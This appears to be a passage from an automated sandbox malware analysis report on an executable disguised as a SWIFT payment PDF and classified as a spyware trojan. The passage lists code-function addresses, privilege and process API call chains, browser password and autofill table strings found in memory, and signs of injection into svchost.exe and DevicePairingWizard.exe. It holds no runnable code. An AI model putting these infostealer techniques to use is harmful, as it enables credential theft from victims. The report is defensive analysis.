                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00522BD42_2_00522BD4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00522BE02_2_00522BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005223902_2_00522390
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00536B9F2_2_00536B9F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005223882_2_00522388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00536BA32_2_00536BA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0052E44A2_2_0052E44A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005304232_2_00530423
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0052E4A32_2_0052E4A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005226DE2_2_005226DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005226E02_2_005226E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005247452_2_00524745
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00521FFC2_2_00521FFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF3302_2_032FF330
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3102_2_0324E310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032313802_2_03231380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F124C2_2_032F124C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032022452_2_03202245
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D2EC2_2_0322D2EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DD1302_2_032DD130
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F1132_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330010E2_2_0330010E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0328717A2_2_0328717A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B1E02_2_0325B1E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032451C02_2_032451C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EE0762_2_032EE076
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032300A02_2_032300A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327508C2_2_0327508C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F70F12_2_032F70F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324B0D02_2_0324B0D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032017072_2_03201707
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032427602_2_03242760
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324A7602_2_0324A760
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F67572_2_032F6757
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DD62C2_2_032DD62C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C6002_2_0325C600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032646702_2_03264670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ED6462_2_032ED646
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032406802_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C6E02_2_0323C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B36EC2_2_032B36EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF6F62_2_032FF6F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA6C02_2_032FA6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330A5262_2_0330A526
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF5C92_2_032FF5C9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F75C62_2_032F75C6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032404452_2_03240445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD4802_2_032AD480
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFB2E2_2_032FFB2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240B102_2_03240B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327DB192_2_0327DB19
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4BC02_2_032B4BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FCA132_2_032FCA13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEA5B2_2_032FEA5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FAA02_2_0325FAA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFA892_2_032FFA89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323E9A02_2_0323E9A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FE9A62_2_032FE9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032099E82_2_032099E8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032859C02_2_032859C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E08352_2_032E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032438002_2_03243800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E8102_2_0326E810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032268682_2_03226868
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032498702_2_03249870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B8702_2_0325B870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B58702_2_032B5870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF8722_2_032FF872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B98B22_2_032B98B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032568822_2_03256882
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F78F32_2_032F78F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032428C02_2_032428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F18DA2_2_032F18DA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324CF002_2_0324CF00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFF632_2_032FFF63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BFF402_2_032BFF40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEFBF2_2_032FEFBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03246FE02_2_03246FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F1FC62_2_032F1FC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0E6D2_2_032E0E6D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03282E482_2_03282E48
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260E502_2_03260E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F0EAD2_2_032F0EAD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241EB22_2_03241EB2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232EE82_2_03232EE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F9ED22_2_032F9ED2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFD272_2_032FFD27
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323AD002_2_0323AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240D692_2_03240D69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7D4C2_2_032F7D4C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252DB02_2_03252DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DFDF42_2_032DFDF4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03249DD02_2_03249DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324AC202_2_0324AC20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BEC202_2_032BEC20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230C122_2_03230C12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243C602_2_03243C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F6C692_2_032F6C69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEC602_2_032FEC60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EEC4C2_2_032EEC4C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D9C982_2_032D9C98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C7CE82_2_032C7CE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FCE02_2_0325FCE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330ACEB2_2_0330ACEB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03258CDF2_2_03258CDF
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D078F611_2_02D078F6
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D078FA11_2_02D078FA
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02CFF1A111_2_02CFF1A1
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D0117A11_2_02D0117A
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D0961011_2_02D09610
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D00F5211_2_02D00F52
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D00F5A11_2_02D00F5A
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02CF549C11_2_02CF549C
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D1FD6A11_2_02D1FD6A
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0456044512_2_04560445
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0462A52612_2_0462A526
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0458467012_2_04584670
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0457C60012_2_0457C600
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461A6C012_2_0461A6C0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0455C6E012_2_0455C6E0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0456068012_2_04560680
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461675712_2_04616757
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0456A76012_2_0456A760
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0456276012_2_04562760
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0460E07612_2_0460E076
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045500A012_2_045500A0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0462010E12_2_0462010E
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0452224512_2_04522245
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0456E31012_2_0456E310
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461EC6012_2_0461EC60
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04616C6912_2_04616C69
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0460EC4C12_2_0460EC4C
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04550C1212_2_04550C12
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0456AC2012_2_0456AC20
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045DEC2012_2_045DEC20
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04578CDF12_2_04578CDF
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0462ACEB12_2_0462ACEB
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04560D6912_2_04560D69
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0455AD0012_2_0455AD00
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04572DB012_2_04572DB0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04580E5012_2_04580E50
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04600E6D12_2_04600E6D
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045A2E4812_2_045A2E48
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04552EE812_2_04552EE8
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04610EAD12_2_04610EAD
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0456CF0012_2_0456CF00
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04566FE012_2_04566FE0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461EFBF12_2_0461EFBF
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0454686812_2_04546868
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0458E81012_2_0458E810
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0460083512_2_04600835
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045628C012_2_045628C0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0457688212_2_04576882
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461E9A612_2_0461E9A6
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0455E9A012_2_0455E9A0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461EA5B12_2_0461EA5B
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461CA1312_2_0461CA13
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04560B1012_2_04560B10
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045D4BC012_2_045D4BC0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045F549012_2_045F5490
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045CD48012_2_045CD480
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_046175C612_2_046175C6
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461F5C912_2_0461F5C9
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0460D64612_2_0460D646
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045FD62C12_2_045FD62C
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461F6F612_2_0461F6F6
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045D36EC12_2_045D36EC
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0456B0D012_2_0456B0D0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_046170F112_2_046170F1
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0459508C12_2_0459508C
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045A717A12_2_045A717A
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0454F11312_2_0454F113
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045FD13012_2_045FD130
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045651C012_2_045651C0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0457B1E012_2_0457B1E0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461124C12_2_0461124C
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0454D2EC12_2_0454D2EC
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461F33012_2_0461F330
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0455138012_2_04551380
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04563C6012_2_04563C60
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045E7CE812_2_045E7CE8
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0457FCE012_2_0457FCE0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045F9C9812_2_045F9C98
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04617D4C12_2_04617D4C
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461FD2712_2_0461FD27
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04569DD012_2_04569DD0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045FFDF412_2_045FFDF4
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04619ED212_2_04619ED2
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04561EB212_2_04561EB2
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461FF6312_2_0461FF63
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045DFF4012_2_045DFF40
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04611FC612_2_04611FC6
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461F87212_2_0461F872
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0456987012_2_04569870
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0457B87012_2_0457B870
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045D587012_2_045D5870
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0456380012_2_04563800
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_046178F312_2_046178F3
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_046118DA12_2_046118DA
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045D98B212_2_045D98B2
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045A59C012_2_045A59C0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045299E812_2_045299E8
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461FA8912_2_0461FA89
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0457FAA012_2_0457FAA0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0459DB1912_2_0459DB19
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0461FB2E12_2_0461FB2E
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045F1B8012_2_045F1B80
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0441EFCA12_2_0441EFCA
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0441E41312_2_0441E413
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0441E7AC12_2_0441E7AC
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0441E2F412_2_0441E2F4
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0441D87812_2_0441D878
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0441CB0312_2_0441CB03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BEF10 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287BE4 appears 96 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B910 appears 268 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AE692 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275050 appears 36 times
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: String function: 045CE692 appears 86 times
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: String function: 04595050 appears 56 times
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: String function: 0454B910 appears 275 times
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: String function: 045A7BE4 appears 99 times
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: String function: 045DEF10 appears 105 times
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: String function: 004115D7 appears 36 times
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: String function: 00416C70 appears 39 times
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: String function: 00445AE0 appears 65 times
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.905073808.0000000004493000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.908228057.000000000468D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@17/11
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_004755C4
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0043305F FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Users\user\AppData\Local\Temp\autA0F7.tmpJump to behavior
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.0000000007789000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                Source: DevicePairingWizard.exe, 0000000C.00000003.1625784978.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1622047389.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1621886723.000000000086C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1626735985.000000000088C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.00000000077EE000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5057040263.00000000077E0000.00000004.00000020.00020000.00000000.sdmp, c104-9J-L.12.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeReversingLabs: Detection: 35%
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile read: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
